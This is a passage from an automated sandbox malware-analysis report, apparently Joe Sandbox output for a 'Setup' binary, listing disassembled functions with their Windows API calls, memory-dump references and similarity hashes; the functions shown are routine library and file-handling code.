                                                                                                                                                                      • Part of subcall function 698F7A10: LockResource.KERNEL32(00000000,69912F8C,?,698EF053,?,00000000,?,698EF018,00000000,?,00000000,?,?), ref: 698F7A2A
                                                                                                                                                                      • Part of subcall function 698F7A10: SizeofResource.KERNEL32(?,?,?,698EF053,?,00000000,?,698EF018,00000000,?,00000000,?,?), ref: 698F7A3C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                    • Opcode ID: 62f5459869a70eca77d492873f0a5e3ea478dc270954dac6b045cf2afec5228b
                                                                                                                                                                    • Instruction ID: 8661eae152b7acbc04e05f3755b7b9fe357f9cd34ce90df14ba9bb3b63a742bb
                                                                                                                                                                    • Opcode Fuzzy Hash: 62f5459869a70eca77d492873f0a5e3ea478dc270954dac6b045cf2afec5228b
                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF0F0363001447BE7209B2EAC80D7B77EDEB962A4B109839F859D6240FB34CC2293B0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F81DE Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2001391462-0
                                                                                                                                                                    • Opcode ID: dce7c39d2ff0061ceda5af0b66fd4e8d844d89869e6921c3fbab43541d675196
                                                                                                                                                                    • Instruction ID: f90409139c9c88c5f524b5b2312ddeab8b0abd054082aed7e0042b48db16903c
                                                                                                                                                                    • Opcode Fuzzy Hash: dce7c39d2ff0061ceda5af0b66fd4e8d844d89869e6921c3fbab43541d675196
                                                                                                                                                                    • Instruction Fuzzy Hash: 62012C79600604AFCB10DF99C884C9AB7B8FF49394B10996AF916CB311D770ED05CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DC8C9E Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2001391462-0
                                                                                                                                                                    • Opcode ID: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                                                                                                                                    • Instruction ID: 5635ecfbb789c2fc7b0b5c33c4641978dcef230d040f630d57af148edcc9fd6e
                                                                                                                                                                    • Opcode Fuzzy Hash: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                                                                                                                                    • Instruction Fuzzy Hash: BE01047A601208EFC710DFA9C884C9AB7ADFF89354711896AF9158B311DB70ED04CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7BF68 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 96200778a3a4324755910e566521faf288bb7afcf5d35f34ee5256ed8914409a
                                                                                                                                                                    • Instruction ID: 8d530d86f7e9458ee94b0e7a363b08582cabec7e3c537f02a66cf09a8019ed32
                                                                                                                                                                    • Opcode Fuzzy Hash: 96200778a3a4324755910e566521faf288bb7afcf5d35f34ee5256ed8914409a
                                                                                                                                                                    • Instruction Fuzzy Hash: EF110534A00209EBDB18DFA8C854A9EB765BF45724B108568F825DF7D0CB36EE01CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7A1FF Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                                                    • Opcode ID: c551533d782063fef5c1fe4b68a964f2932925b5213966c538f611ab616555d1
                                                                                                                                                                    • Instruction ID: 60d9279eaa46433e1a379f2a0e18b2999df94e586376b23bdee59544e07478cd
                                                                                                                                                                    • Opcode Fuzzy Hash: c551533d782063fef5c1fe4b68a964f2932925b5213966c538f611ab616555d1
                                                                                                                                                                    • Instruction Fuzzy Hash: B2F04974A10305EBDB14DFA8C904B4D3BA5BF4A360F10C1A8B858DF790CB72DA01CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F7F22 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00002100,00000002,00000000,698F7BC3,C0000000,?,00000000,?,?,698F7BC3,?,C0000000,00000000,00000002,00002100,?), ref: 698F7F5C
                                                                                                                                                                      • Part of subcall function 698F7E95: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,698F7F46,00002100,00000002,00000000,698F7BC3,C0000000,?,?,?,698F7BC3,?,C0000000,00000000), ref: 698F7EA6
                                                                                                                                                                      • Part of subcall function 698F7E95: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 698F7EB6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCreateFileHandleModuleProc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2580138172-0
                                                                                                                                                                    • Opcode ID: e24aff7d72cdb839788b40d7050ec9f2651fcd6b1482533a3c1673c8e0e1ee1d
                                                                                                                                                                    • Instruction ID: 2981ddb276f2c3bfc9d573e43a3e9f7c77c0c70626006a75102f58118176292b
                                                                                                                                                                    • Opcode Fuzzy Hash: e24aff7d72cdb839788b40d7050ec9f2651fcd6b1482533a3c1673c8e0e1ee1d
                                                                                                                                                                    • Instruction Fuzzy Hash: 76F0AF3340454ABBDF029EA4DC009CA7F66EF197A0F00A959FA24951A0D332D872AB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7809D Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,?,00000000,?,00000000,00000001,?,69D7A9FA,?,80000000,00000001,00000003,00000080,00000000), ref: 69D780D7
                                                                                                                                                                      • Part of subcall function 69DC89E2: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,69D780C1,?,?,?,?,00000000,?,00000001,?,69D7A9FA,?,80000000,00000001), ref: 69DC89F3
                                                                                                                                                                      • Part of subcall function 69DC89E2: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 69DC8A03
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCreateFileHandleModuleProc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2580138172-0
                                                                                                                                                                    • Opcode ID: f989c4c9887aa0c7ca5e582f9a23f620260c9d93d4003cc8b0bc1d69ef6bef31
                                                                                                                                                                    • Instruction ID: 0f7ddb95f527b0102a354e40948f46e1655c9bc140cf84bf224c7882e8c9af82
                                                                                                                                                                    • Opcode Fuzzy Hash: f989c4c9887aa0c7ca5e582f9a23f620260c9d93d4003cc8b0bc1d69ef6bef31
                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF0B23200421AFBCF229F95DD01DCA3F26FF19360F118125FA245A860C732D571EBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D79E49 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                                                    • Opcode ID: ebb82cf34805a0b0a7b216d75227233880ceae25585949a54a0f6dd2a1bcdf77
                                                                                                                                                                    • Instruction ID: 71eb77acdc7bc16535d8dada1630743e391fcc2cb3cdd4eaf32437f8b6324fba
                                                                                                                                                                    • Opcode Fuzzy Hash: ebb82cf34805a0b0a7b216d75227233880ceae25585949a54a0f6dd2a1bcdf77
                                                                                                                                                                    • Instruction Fuzzy Hash: B0F0F975601309EBDB20DF68C904B5D3BA5AF45764F2481A8B819EF790CB71EE01CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA53E5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 3ee51dd97339dbd4e1554b41367bdbf5544deb5955dfb5624cd5784d7958a8e8
                                                                                                                                                                    • Instruction ID: ad2b94ecbd8298d4584cdac9f7eda93c8b632259b2f386dbb07ef787902826c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ee51dd97339dbd4e1554b41367bdbf5544deb5955dfb5624cd5784d7958a8e8
                                                                                                                                                                    • Instruction Fuzzy Hash: FEF0BE3A9441899ECF01CBB4C9007ECBB656F2231DF40E070D4607BAA0C779A62A97A1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D77C6E Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D77C75
                                                                                                                                                                      • Part of subcall function 69D77CE8: __EH_prolog3.LIBCMT ref: 69D77CEF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 62a85f7790cd3eae4ff375e3f11791a5bbf1b88d9b93297726169f69551299a3
                                                                                                                                                                    • Instruction ID: a821ffac54787859128508ae4f5a204333fa2fb65905f24d2f816e25661bcc53
                                                                                                                                                                    • Opcode Fuzzy Hash: 62a85f7790cd3eae4ff375e3f11791a5bbf1b88d9b93297726169f69551299a3
                                                                                                                                                                    • Instruction Fuzzy Hash: CDF01DB4740A02AAD748DF3885403ADF6A5BF58308F40963D902DE7741CB316815CBD4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E0ECA Relevance: 1.5, APIs: 1, Instructions: 25windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 698E0F06
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                    • Opcode ID: dd96207b4b9e11bbf3edfea9dcd46d9fbb04db2bc096648e068fd450d496966b
                                                                                                                                                                    • Instruction ID: f39396545d0c9445a31bd62c955530a8dbe52a5540ba3888d8d079251b6cbc4a
                                                                                                                                                                    • Opcode Fuzzy Hash: dd96207b4b9e11bbf3edfea9dcd46d9fbb04db2bc096648e068fd450d496966b
                                                                                                                                                                    • Instruction Fuzzy Hash: F0F039B690020CBBDB00CFD8C806BDEFBF8BB59300F50846AE611B7250D7709608CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA8C7A Relevance: 1.5, APIs: 1, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA8C81
                                                                                                                                                                      • Part of subcall function 69DAFFA8: _memcpy_s.LIBCMT ref: 69DAFFCE
                                                                                                                                                                      • Part of subcall function 69DAFFA8: _memcpy_s.LIBCMT ref: 69DAFFDE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s$H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1888667434-0
                                                                                                                                                                    • Opcode ID: 1f5832d9245c8696f673b72774b56ead4060431a3e3e89b708c3d7047e57f6f4
                                                                                                                                                                    • Instruction ID: 8b9cd095b2d1afaad77dee2129d8195df0bf69a4924913dc26028c3cca42e0f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f5832d9245c8696f673b72774b56ead4060431a3e3e89b708c3d7047e57f6f4
                                                                                                                                                                    • Instruction Fuzzy Hash: 9BF03079A00208EBCF00DFA9C98098DFB74BF48718F44D479E9186B700C7759A18DBE1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DB93E Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698DB945
                                                                                                                                                                      • Part of subcall function 698F830D: _vwprintf.LIBCMT ref: 698F8353
                                                                                                                                                                      • Part of subcall function 698F830D: _vswprintf_s.LIBCMT ref: 698F8378
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_vswprintf_s_vwprintf
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3682816334-0
                                                                                                                                                                    • Opcode ID: ec4f7e60c09f365cb7b1084d15b50fbc853396e793c7287d4e51ac514c64abdc
                                                                                                                                                                    • Instruction ID: be28b853cc6de84ba2646fcdad554e648aeb600b8d8225dbc7251afcf568f8b0
                                                                                                                                                                    • Opcode Fuzzy Hash: ec4f7e60c09f365cb7b1084d15b50fbc853396e793c7287d4e51ac514c64abdc
                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF01C7450014ADFCF00DFA4C854AADBBB9BF5431CF41981DE5259B251DB31DA16CB51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F7E56 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000006,?,?,?,?,698DDAC1,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 698F7E76
                                                                                                                                                                      • Part of subcall function 698F7F08: GetLastError.KERNEL32(698F7B0B,?,?,?,00000000), ref: 698F7F08
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 25c8783f4bf4f8c4f8726bf5409ddcc6f8f4a9545601444be9db8d4f92e27abf
                                                                                                                                                                    • Instruction ID: ec8764d0fa5890125f024f6648c2f2f7751480712ad5539f3573420ac10c9505
                                                                                                                                                                    • Opcode Fuzzy Hash: 25c8783f4bf4f8c4f8726bf5409ddcc6f8f4a9545601444be9db8d4f92e27abf
                                                                                                                                                                    • Instruction Fuzzy Hash: 7BE09271600148BFAB04CFA4C840C8E3BB8EF05350B10465DF915C3290D730DD10DB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D739AD Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                      • Part of subcall function 69DC8DCD: _vwprintf.LIBCMT ref: 69DC8E13
